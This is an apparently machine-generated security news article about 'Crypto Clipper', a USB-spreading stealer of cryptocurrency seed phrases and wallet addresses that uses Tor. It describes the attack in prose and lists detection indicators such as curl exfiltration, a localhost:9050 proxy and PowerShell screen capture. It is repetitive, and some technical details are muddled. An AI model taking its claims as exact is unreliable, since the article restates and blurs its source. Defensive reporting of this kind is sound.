Ethical Hacking News
A new lightweight backdoor has been discovered by Microsoft that can steal cryptocurrency credentials via USB drives and send them to attacker-controlled servers via Tor. The malware, named Crypto Clipper, uses a combination of clipboard targeting, screenshot capture, and remote code execution to deliver outsized impact when paired with anonymized communications.
Crypto Clipper is a new lightweight backdoor malware discovered by Microsoft that spreads through USB drives and steals cryptocurrency credentials. The malware monitors clipboard contents for patterns consistent with wallet addresses or seed phrases, sending the information to attacker-controlled servers via Tor. Crypto Clipper infects .lnk files on a USB drive, which are then executed by the device, scanning the infected USB drive to conceal evidence of the worm. The malware uploads seed phrases and screenshots to the attacker's server, allowing it to divert payments to its pockets. Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl.
Microsoft has recently discovered a new lightweight backdoor that has been spreading through USB drives and stealing cryptocurrency credentials. The malware, named Crypto Clipper, is known for its ability to monitor clipboard contents for patterns consistent with wallet addresses or seed phrases, and sends the information to attacker-controlled servers via Tor.
The malware spreads by infecting .lnk files on a USB drive, which are then executed by the device. The infected code checks whether it already exists on the machine and downloads it if not. To better conceal evidence of the worm, Crypto Clipper scans the infected USB drive and names the .lnk files with similar names.
Crypto Clipper's high-level execution flow involves monitoring clipboard contents for patterns consistent with standardized 12- or 24-word seed phrases. When found, it uploads them along with screenshots to the attacker's server. The stealer also replaces addresses it finds with ones belonging to attacker-controlled wallets, allowing it to divert payments to the attacker's pockets.
The purpose of the screenshots, according to Microsoft, is to provide context that may be useful. This malware family shows how lightweight, script-based stealers can deliver outsized impact when paired with anonymized communications and runtime tasking. The combination of Tor-routed C2, clipboard targeting, screenshot capture, and remote code execution gives attackers both immediate monetization paths and continued control over compromised devices.
Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl. Microsoft Defender Antivirus detects it as Trojan: Win32/CryptoBandits.A. More generically, the strongest indications of infection are script interpreters spawning suspicious child processes, proxy usage on localhost:9050, screen-capture commands in PowerShell, and signs of clipboard inspection or crypto-address replacement.
This discovery highlights the growing threat of lightweight malware that can deliver significant impact when paired with anonymized communications and runtime tasking. As such, it is crucial for users to remain vigilant and take necessary precautions to protect themselves against such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/Microsoft-Discovers-New-Lightweight-Backdoor-that-Steals-Cryptocurrency-The-Rise-of-Crypto-Clipper-ehn.shtml
https://arstechnica.com/security/2026/06/microsoft-spots-new-self-propagating-malware-for-stealing-cryptocurrency/
Published: Thu Jun 18 20:53:50 2026 by llama3.2 3B Q4_K_M
